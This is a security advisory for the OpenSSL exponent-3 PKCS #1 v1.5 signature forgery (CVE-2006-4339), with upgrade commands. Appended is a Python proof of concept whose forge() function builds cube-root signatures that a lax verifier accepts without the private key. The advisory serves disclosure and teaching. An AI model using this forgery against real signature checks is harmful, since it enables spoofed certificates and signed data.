1. Synopsis
============

An attack on openssl(1)'s implementation of PKCS #1 v1.5 signature verification.

2. Background
==============

The OpenSSL Project is a collaborative effort to develop a robust, commercial-grade, full-featured, and Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols as well as a full-strength general purpose cryptography library.

3. Description
===============

If an RSA key with public exponent 3 is used, it may be possible to forge a PKCS #1 v1.5 signature that verifies under that key without knowing the private key. An implementation is affected if, after stripping the 00 01 FF..FF 00 padding from the result of the RSA public operation, it checks only the DigestInfo and hash at the start of the recovered block and does not reject excess data following them. With exponent 3 an attacker can choose a short FF run, leave arbitrary bytes after the hash, and take an integer cube root of the resulting block: because the value stays below the modulus, cubing the root reproduces the expected prefix exactly and only disturbs the trailing bytes that such a verifier ignores. A verifier that re-encodes the expected block and compares it in full is not affected. (This is the issue tracked as CVE-2006-4339.)

4. Impact
==========

Since CAs with exponent-3 keys are in wide use, and PKCS #1 v1.5 is the signature scheme used in X.509 certificates, all software that uses OpenSSL to verify X.509 certificates is potentially vulnerable, as is any other use of PKCS #1 v1.5 signature verification. This includes software that uses OpenSSL for SSL or TLS. OpenSSL versions up to and including 0.9.7j and 0.9.8b are affected; 0.9.7k and 0.9.8c contain the fix.

5. Affected Packages
=====================

openssl

6. Resolution
=============

Update openssl as soon as possible. All openssl users should upgrade to the latest available version:

# scribe update
# cast -c openssl

or

# scribe update
# sorcery queue-security
# cast --queue

7. References
==============

[1] http://www.openssl.org/news/secadv_20060905.txt
[2] http://www.imc.org/ietf-openpgp/mail-archive/msg14307.html
[3] http://bugs.sourcemage.org/show_bug.cgi?id=13081
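As an added illustration of the flaw described in section 3, the following script (written for this advisory, not OpenSSL's code) builds a 2048-bit exponent-3 RSA key, signs a constructed message, and then forges a second signature for the same message using only the public key. Two verifiers model the two behaviours: verify_lax stops after comparing the DigestInfo and hash, as a vulnerable implementation does, while verify_strict re-encodes the whole block and compares it byte for byte. The key, the message, the verifier names and the SHA-1 DigestInfo choice are all assumptions made here; only the standard library is used.

```python
"""Added demo of the exponent-3 PKCS #1 v1.5 forgery from section 3 (pure Python, stdlib only).
The key, message and both verifiers are constructed for illustration; none of this is OpenSSL code."""
import hashlib
import hmac
import random

E = 3
# DigestInfo prefix for SHA-1 (RFC 3447 section 9.2, note 1); the 20-byte digest follows it.
SHA1_DIGESTINFO = bytes.fromhex("3021300906052b0e03021a05000414")
SMALL_PRIMES = [p for p in range(3, 200, 2) if all(p % q for q in range(3, p, 2))]

def is_probable_prime(n, rng, rounds=32):
    """Trial division, then Miller-Rabin; adequate for a demo key."""
    if n < 4:
        return n in (2, 3)
    if n % 2 == 0 or any(n % p == 0 for p in SMALL_PRIMES):
        return n in SMALL_PRIMES
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True

def gen_prime(bits, rng):
    """Prime with the top bit set and p % 3 != 1, so that 3 is invertible mod p-1."""
    while True:
        p = rng.getrandbits(bits) | (1 << (bits - 1)) | 1
        if p % 3 != 1 and is_probable_prime(p, rng):
            return p

def gen_key(bits=2048, seed=2006):
    """Seeded demo RSA key with public exponent 3 (assumed for this demo); returns (n, d)."""
    rng = random.Random(seed)
    p, q = gen_prime(bits // 2, rng), gen_prime(bits // 2, rng)
    return p * q, pow(E, -1, (p - 1) * (q - 1))

def emsa_pkcs1_v15(msg, k):
    """EMSA-PKCS1-v1_5 block: 00 01 FF..FF 00 DigestInfo||SHA-1(msg), k bytes long."""
    t = SHA1_DIGESTINFO + hashlib.sha1(msg).digest()
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t

def rsa_public(sig, n):
    """Raw RSA public operation; None unless sig is a k-byte value below n."""
    k, s = (n.bit_length() + 7) // 8, int.from_bytes(sig, "big")
    return pow(s, E, n).to_bytes(k, "big") if len(sig) == k and s < n else None

def sign(msg, n, d):
    k = (n.bit_length() + 7) // 8
    return pow(int.from_bytes(emsa_pkcs1_v15(msg, k), "big"), d, n).to_bytes(k, "big")

def verify_lax(msg, sig, n):
    """Vulnerable pattern: strip the padding from the left, compare the DigestInfo that
    follows, and never check that the digest ends exactly at the end of the block."""
    em = rsa_public(sig, n)
    if em is None or em[:2] != b"\x00\x01":
        return False
    i = 2
    while i < len(em) and em[i] == 0xFF:
        i += 1
    if i >= len(em) or em[i] != 0x00:
        return False
    t = SHA1_DIGESTINFO + hashlib.sha1(msg).digest()
    return em[i + 1:i + 1 + len(t)] == t  # whatever follows t is silently ignored

def verify_strict(msg, sig, n):
    """Fixed pattern: re-encode and compare the whole block, so trailing bytes cannot hide."""
    em = rsa_public(sig, n)
    return em is not None and hmac.compare_digest(em, emsa_pkcs1_v15(msg, len(em)))

def icbrt(x):
    """Floor of the integer cube root of a large x, Newton iteration from above."""
    s = 1 << ((x.bit_length() + 2) // 3)  # starting point >= cbrt(x)
    while True:
        t = (2 * s + x // (s * s)) // 3
        if t >= s:
            return s
        s = t

def forge(msg, n, ff_count=8):
    """Forge without the private key: a short FF run puts DigestInfo||hash high in the
    block and leaves the rest free. The cube root of that block, cubed over the integers
    (it never exceeds n, so no reduction happens), keeps the prefix and only perturbs
    the free low bytes, which verify_lax never looks at."""
    k = (n.bit_length() + 7) // 8
    prefix = b"\x00\x01" + b"\xff" * ff_count + b"\x00" + SHA1_DIGESTINFO + hashlib.sha1(msg).digest()
    free_bits = 8 * (k - len(prefix))
    target = int.from_bytes(prefix, "big") << free_bits
    s = icbrt(target) + 1  # s**3 >= target, and s**3 - target < 3*s**2 + 3*s + 1, far below 2**free_bits
    assert s ** 3 >> free_bits == int.from_bytes(prefix, "big"), "modulus too small for this ff_count"
    return s.to_bytes(k, "big")
```

Running forge() against a key and checking the result with both verifiers shows the point of the advisory: the genuine signature passes both checks, the forged one passes only verify_lax, and verify_strict rejects it because the re-encoded block differs from the cube in its trailing bytes. The slack argument in forge() depends on the modulus size; with a 1024-bit modulus the free space shrinks to the point where the assertion can fail, which is why the real attack targeted larger exponent-3 keys.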